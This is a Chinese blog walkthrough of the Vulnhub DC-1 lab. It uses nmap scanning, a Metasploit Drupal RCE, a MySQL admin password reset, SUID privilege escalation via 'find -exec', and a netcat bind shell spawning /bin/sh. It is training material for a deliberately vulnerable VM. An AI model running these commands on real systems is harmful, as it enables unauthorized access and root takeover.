专栏首页ly0nVulnhub渗透测试:DC-1

Vulnhub渗透测试:DC-1

Vulnhub

Vulnhub是一个特别好的渗透测试实战网站,提供了许多带有漏洞的渗透测试虚拟机下载。 新手入门DC-1:下载地址

https://www.vulnhub.com/entry/dc-1-1,292/

环境搭建

攻击机kali IP 192.168.222.201 DC-1 IP 192.168.222.131 我们下载好DC-1之后,将.ova文件导入VMware中,网卡模式设置为NAT,让其自动获取IP,搭建好之后我们是没办法登录进去获取到DC-1的IP,所以我们就可以紧接着进行下面的操作。

信息收集

由于我们并不知道DC-1的IP是什么,所以我们需要通过扫描工具NMAP来进行扫描

nmap -sP 192.168.222.0/24

来扫描内网内的存活IP。

成功扫描出DC-1的主机IP,下一步我们可以来看这个靶机开启了哪些端口。

nmap -sV 192.168.222.131
这个是简单的能看出开启的端口号,但并不能看到开启了什么服务
nmap -A -T4 -p- 192.168.222.131

漏洞利用

我们可以看到在80端口,存在着Drupal的服务,我们可以访问看下。

我们不知道账号和密码,但是知道了这个服务,谷歌一波知道了这个服务版本的RCE漏洞,紧接着我们可以尝试利用下。

初渗透

然后使用MSF进行利用。

使用第四个来打。

输入shell后利用Python来获取到一枚sh.

python -c "import pty;pty.spawn('/bin/bash')"

ls后找到flag1.txt,我们查看这个文件。

看到提示是关于cms的,我们应该能找到相关的配置文件。在sites这个文件夹中发现了default文件夹,里面就是我们这个cms的配置文件。

后渗透

我们获取到了数据库的配置文件,所以我们可以连接数据库,看能否在数据库里得到些什么。 使用mysql -u dbuser -p R0ck3t 登录数据库

成功登录!我们接着对数据库进行操作。

查询表名,发现了users表。然后使用查询语句查询表里面的所有。

select * from users;

发现了两个用户一个是admin、一个是Fred,但是我们看到他们的密码都经过了加密,应该是这个服务专属的加密方式,在scripts/中找到了加密的脚本。

我们可以使用这个加密脚本加密一个铭文,然后再数据库内更新admin的密码,这样我们就可以使用我们加密的明文来进行登录了。 我们按照我们的想法来,第一步先生成一个我们已知的明文密码

第二步,利用mysql来更新admin账户的密码。从而进行登录。

登陆成功,找到flag3!

提示中需要寻找密码、需要-exec命令发现隐藏的部分 再home目录下发现了flag4

根据提示,可以知道最终的flag在root目录下。我们要做的就是要提权。 这里要采用suid提权的方法 学习地址 查找具有root权限的suid

find / -perm -u=s -type f 2>/dev/null

利用find提权

可以查看下find是否以root权限执行。 命令:

find /var/www/scripts -exec whoami \;

反弹shell

find /var/www/scripts -exec nc -lvp 5000 -e /bin/sh \;

总结

练习结束,练习的过程是很好的学习的过程

在这个靶机的练习中,主要的点就是Drupal CMS的历史漏洞以及suid的提权

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 帝国CMS后台Getshell

    今天在群里看到了一个师傅再问有没有人做过帝国CMS的后台Getshell,我之前也是没做过的,于是就下了一个尝试着做了下,那个师傅给我说了出现漏洞的是一个...

    ly0n
  • Ret2shellcode

    在栈溢出的基础上,要想执行shellcode,需要相应的binary在运行时shellcode所在区域具有可执行权限。

    ly0n
  • GKCTF-WEB题目部分复现

    我们根据代码可以得到,我们需要传入Ginkgo参数,其值需要经过base64进行加密,后端进行解码通过eval函数执行,所以我们可以传入base64编码后的一句...

    ly0n
  • 捆绑影视IP,玩跨界营销,你真学不会!

    上周,由爱奇艺影业(北京)有限公司发行的《极限挑战之皇家宝藏》 大电影(以下简称:《极限挑战大电影》)在全国上映,这也是继《爸爸去哪儿》《奔跑吧,兄弟》后又一个...

    曾响铃
  • 学习前端开发,不知道怎么做,不知道问什么了,怎么办

    我刚开始搞培训的时候,不是很懂学生的心理。我想法很简单,你不会,我教你,你努力学,学会就挣钱,很清晰。但人本身是复杂的,他会受很多外在因素的影响。 他会想,我学...

    web前端教室
  • 记一次有意思的文件上传

    由于站点对上传文件未作过滤或过滤机制不严(文件后缀或类型),导致恶意用户可以上传脚本文件,通过上传文件可达到控制网站权限的目的。

    徐焱
  • 写时复制技术(详解版)

    我们知道了一个进程如何采用请求调页,仅调入包括第一条指令的页面,从而能够很 快开始执行。然而,通过系统调用 fork() 的进程创建最初可以通过使用类似于页面共...

    用户5546570
  • Hanlp使用Bug记录

    最近一直比较忙,好多私信也没时间回复。以后要完全从CV转NLP,所以博客内容可能要作调整了。

    用户3492023
  • 专访北大赵东岩研究员:NLPCC 会议如何引领中国 NLP 走向世界?

    AI 科技评论按:在自然语言处理(NLP)领域工作的学者(学生)可能无人不知 ACL、EMNLP 这样的 NLP 顶会,但国内发起的这个 NLP 国际会议尽管已...

    企鹅号小编
  • JS贪吃蛇

      儿时的经典游戏,无非俄罗斯方块、贪吃蛇、推箱子,之后才有了智能拼图、麻将、象棋、连连看、消消乐。今天拿出来一款JS贪吃蛇供大家学习、参考。   游戏玩法不...

    我不是费圆

扫码关注云+社区

领取腾讯云代金券